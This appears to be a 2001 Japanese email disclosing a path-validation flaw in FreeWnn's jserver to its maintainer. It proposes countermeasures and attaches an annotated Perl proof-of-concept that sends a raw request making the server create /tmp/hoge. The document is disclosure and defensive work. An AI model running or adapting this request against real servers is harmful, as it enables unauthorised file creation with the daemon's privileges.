- To: hiroo@oikumene.gcd.org
- Subject: Re: security bug report
- From: yusuke@kmc.kyoto-u.ac.jp (TABATA yusuke)
- Date: Tue, 14 Aug 2001 21:44:48 +0900 (JST)
- Cc: yusuke@kmc.kyoto-u.ac.jp
- Delivered-To: hiroo@oikumene.gcd.org
- In-Reply-To: Your message of "Tue, 14 Aug 2001 21:06:53 +0900".<20010814210653L.hiroo@oikumene.gcd.org>
田畑です
メイリングリストには参加していないので
小野さんのみへのリプライとなります。転送などは御自由にどうぞ。
<20010814210653L.hiroo@oikumene.gcd.org>の記事において
hiroo@oikumene.gcd.orgさんは書きました。
>> 田畑さんがチェックされた FreeWnn のバージョンと、ソースコードの該当す
>> る箇所を教えて頂けないでしょうか。
FreeWnn-1.1.1-a17です。
exploitプログラムの完全版は最後に付けます(若干冗長なソースですが)
jserver/de.c の demon_main.c() でパケットを受けとり
jserver/dispatch.c の do_command() 中の switch文で
js_mkdir()や js_dic_file_create()を経て実際のファイル操作へ至るまでの
パスでチェックが行なわれていないということが問題のようです。
他にもあると思いますのでチェックをお願いします。
>> これから調査するところですが、報告して頂いた内容からすると、Wnn のプロ
>> トコルの正当な要求のようなので (牧歌的な時代に作られたものということな
>> のでしょうが)、よく考えて変更を加える必要があると思っています。
>> (cf. [freewnn:00683])
>> 対策について提案があれば歓迎致します。
対策としては
*rootで起動した際にはTCPによる接続は受けない
*rootで動かしてはいけないことを明記する/rootでは動かないようにする
*辞書のディレクトリの外にはファイル操作をできないようにする
*特定の名前のパターンを持ったファイル以外は操作できないようにする
*Wnn6と同じwnnhostsを採用する、ただしこのアクセスコントロールは接続時に行う
などが思いつきます。
>> 暫定策 (workaround)、恒久策 (solution) が定まり次第報告したいと考えて
>> いますが、そういうわけで、今すぐは示せません。
solutionを考える際には
*辞書ファイルのプライバシー
*認証
*通信の暗号化
なども検討をお願いします。
以下は冗長ですが、問題を引き起こすプログラムです
#! /usr/bin/perl
# Proof-of-concept attached to the bug report above: it connects to a
# FreeWnn jserver and writes a single hand-built request.  The report
# traces such a request from demon_main() through do_command() into
# js_mkdir()/js_dic_file_create() with no check on the supplied path.
# The countermeasures the report proposes are restricting file
# operations to the dictionary directory, refusing TCP connections when
# running as root, and host-based access control at connect time.
# Kept as evidence of the issue; only comments have been added.  The
# script has no "use strict; use warnings", so every variable below is
# a package global.
#
# Usage: <script> [host] [port]   (defaults: localhost, 22273)
($them,$port) = @ARGV;
$port = 22273 unless $port;
$them = 'localhost' unless $them;
# Ctrl-C kills the child reader process (forked below) before exiting.
# Naming the handler by string is an old idiom; \&dokill is the usual
# form today.
$SIG{'INT'} = 'dokill';
sub dokill { kill 9,$child if $child; }
use Socket;
# Hand-rolled sockaddr_in layout (family, port, IPv4 address, padding);
# Socket's pack_sockaddr_in() builds the same structure portably.
$sockaddr = 'S n a4 x8';
# Shells out for the local host name.  Its only consumer is
# $thisaddr/$this, which feeds the bind() that is commented out below,
# so this lookup is effectively dead code.
chop($hostname = `hostname`);
($name, $aliases, $proto) = getprotobyname('tcp');
# Accept a service name instead of a numeric port.
($name, $aliases, $port) = getservbyname($port, 'tcp')
unless $port =~ /^\d+$/;
($name, $aliases, $type, $len, $thisaddr) =
gethostbyname($hostname);
# No failure check: if this lookup fails $thataddr stays undef and the
# pack() below presumably packs a zero address instead of reporting
# a clear error.
($name, $aliases, $type, $len, $thataddr) = gethostbyname($them);
$this = pack($sockaddr, &AF_INET, 0, $thisaddr);
$that = pack($sockaddr, &AF_INET, $port, $thataddr);
# Bareword filehandle S and the &CONSTANT call form are old-style Perl.
socket(S, &PF_INET, &SOCK_STREAM, $proto) || die "socket: $!";
# bind(S, $this) || die "bind: $!";
connect(S, $that) || die "connect: $!";
# Enable autoflush on S so the request is written immediately.
select(S); $| = 1; select(STDOUT);
print "connected!";
# A fork() failure returns undef and is not distinguished from the
# child case here: the parent would then fall into the reader branch
# and never send anything.
if ($child = fork) {
# Parent: write the request, give the child reader 3 seconds to print
# whatever the server answers, then kill it.
print STDOUT "send";
# Raw wire request: a fixed header, a NUL-terminated path under /tmp,
# and a fixed trailer.  The meaning of the header/trailer fields is not
# established here; the report's point is that the path itself is
# never validated by the server.
print S "\x00\x00\x00\x66\x00\x00\x00\x00".
"/tmp/hoge\x00".
"\x00\x00\x00\x00\x00\x00\x00\x03";
print STDOUT ".done.\n";
sleep 3;
# "do SUBNAME()" is a deprecated call form; plain dokill() is equivalent.
do dokill();
}
else {
# Child: echo every line the server sends to STDOUT.
while (<S>) {
print;
}
}